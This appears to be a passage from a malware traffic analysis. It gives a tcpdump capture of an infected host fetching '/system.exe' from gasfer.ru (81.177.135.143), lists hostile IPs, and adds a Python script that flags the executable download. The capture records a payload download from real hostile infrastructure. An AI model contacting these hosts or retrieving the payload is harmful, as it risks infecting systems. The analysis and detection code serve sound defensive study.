The malware downloads and loads the dropper from 64.31.23.26, but the host is down, so it dies at this point.
Hostile IPs:
64.31.23.26
81.177.135.143
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
E.....@....!
.
.Q....S.P........P.@)Zs..GET /system.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@.....
.
.@....,.P.3..X.}.P.?..z........
2020-05-29 21:35:33.690338 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], ack 394, win 237, length 0
E..(..@.2...Q...
.
..P.S.......^P..............
2020-05-29 21:35:33.730407 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [P.], seq 1:276, ack 394, win 237, length 275: HTTP: HTTP/1.1 200 OK
E..;..@.2...Q...
.
..P.S.......^P.......HTTP/1.1 200 OK
Date: Sat, 30 May 2020 01:37:41 GMT
Content-Type: application/octet-stream
Content-Length: 94720
Connection: keep-alive
Server: Jino.ru/mod_pizza
Last-Modified: Sat, 09 May 2020 23:44:17 GMT
ETag: "503c713-17200-5a53fb1282665"
Accept-Ranges: bytes
2020-05-29 21:35:33.731426 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], seq 276:1736, ack 394, win 237, length 1460: HTTP
E.....@.2..6Q...
.
..P.S.......^P....^..MZ...................@....................................... .!..L.!This program cannot be run in DOS mode..
2020-05-29 21:35:33.348218 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [P.], seq 3090396531:3090396582, ack 1491893693, win 16363, length 51: HTTP
E..[..@.....
.
.@....,.P.3.sX.}.P.?.4/..........`:.....k.>...t.Y..5.=T}[[..K.)a......j. .hg
2020-05-29 21:35:33.374491 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [.], ack 51, win 271, length 0
E..(t.@.0.j.@...
.
..P.,X.}..3..P...>|........
2020-05-29 21:35:33.455371 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [P.], seq 1:50, ack 51, win 271, length 49: HTTP
E..Yt.@.0.j.@...
.
..P.,X.}..3..P....B......,..'.x..1.....%..p..W.:.q...fj..y.......c.G~/
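As an added example (not part of the original write-up), the script below parses tcpdump -A style output like the capture above, keeps only packets exchanged with the listed hostile IPs, pulls the HTTP request path and Host header out of the ASCII dump, and flags an application/octet-stream response whose body carries the PE "MZ ... This program cannot be run in DOS mode" marker. It also totals bytes sent to and received from each hostile IP, which is a quick way to see which peer actually delivered content. The embedded sample is an abridged copy of the capture above with the dump artifacts repaired; HOSTILE_IPS and the function names are my own choices.

```python
import re
from collections import defaultdict

# Hostile IPs listed in the write-up.
HOSTILE_IPS = {"64.31.23.26", "81.177.135.143"}

# tcpdump summary line: timestamp, "IP src.port > dst.port:", flags/seq/win,
# "length N", then optionally ": HTTP" or ": HTTP: <request or status line>".
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): "
    r".*?length (?P<len>\d+)"
    r"(?:: HTTP(?:: (?P<http>.*))?)?$"
)
# HTTP header line inside the ASCII payload dump, e.g. "Host: gasfer.ru".
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")

# Abridged copy of the capture above (sample input for this example).
CAPTURE = """\
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
E.....@....!
.
.Q....S.P........P.@)Zs..GET /system.exe HTTP/1.1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.730407 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [P.], seq 1:276, ack 394, win 237, length 275: HTTP: HTTP/1.1 200 OK
E..;..@.2...Q...
.
..P.S.......^P.......HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 94720
Server: Jino.ru/mod_pizza
2020-05-29 21:35:33.731426 IP 81.177.135.143.80 > 10.1.10.15.49235: Flags [.], seq 276:1736, ack 394, win 237, length 1460: HTTP
E.....@.2..6Q...
.
..P.S.......^P....^..MZ..........@........!..L.!This program cannot be run in DOS mode..
2020-05-29 21:35:33.348218 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [P.], seq 3090396531:3090396582, ack 1491893693, win 16363, length 51: HTTP
E..[..@.....
2020-05-29 21:35:33.455371 IP 64.31.23.26.80 > 10.1.10.15.49196: Flags [P.], seq 1:50, ack 51, win 271, length 49: HTTP
E..Yt.@.0.j.@...
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0
E..(..@.....
"""


def parse_capture(text):
    """Group tcpdump -A output into packets: summary fields plus the ASCII lines that follow."""
    packets = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["len"] = int(pkt["len"])
            pkt["payload"] = []
            packets.append(pkt)
        elif packets:
            packets[-1]["payload"].append(line)
    return packets


def parse_headers(payload_lines):
    """Pick HTTP header lines out of the ASCII dump; garbled binary lines never match."""
    headers = {}
    for line in payload_lines:
        m = HEADER_RE.match(line)
        if m:
            headers[m.group(1)] = m.group(2).strip()
    return headers


def analyze(packets, hostile=HOSTILE_IPS):
    """Return (findings, bytes_to_peer, bytes_from_peer) for traffic involving hostile IPs."""
    findings = []
    bytes_to, bytes_from = defaultdict(int), defaultdict(int)
    for p in packets:
        if p["dst"] in hostile:
            peer = p["dst"]
            bytes_to[peer] += p["len"]
        elif p["src"] in hostile:
            peer = p["src"]
            bytes_from[peer] += p["len"]
        else:
            continue
        headers = parse_headers(p["payload"])
        http = p["http"] or ""
        if http.startswith("GET "):
            findings.append(("request", peer, headers.get("Host"), http.split()[1]))
        if headers.get("Content-Type") == "application/octet-stream":
            findings.append(("octet_stream_response", peer, int(headers.get("Content-Length", "0"))))
        if any("MZ" in ln and "This program cannot be run in DOS mode" in ln for ln in p["payload"]):
            findings.append(("pe_header_in_body", peer, p["ts"]))
    return findings, dict(bytes_to), dict(bytes_from)


if __name__ == "__main__":
    found, to_peer, from_peer = analyze(parse_capture(CAPTURE))
    for f in found:
        print(f)
    print("bytes to hostile peers:", to_peer)
    print("bytes from hostile peers:", from_peer)
```

Run on the sample, it reports the GET /system.exe request to gasfer.ru (81.177.135.143), the 94720-byte application/octet-stream response, and the MZ/DOS-stub marker in the next segment, while the 64.31.23.26 flow shows only the short 51/49-byte non-HTTP exchange.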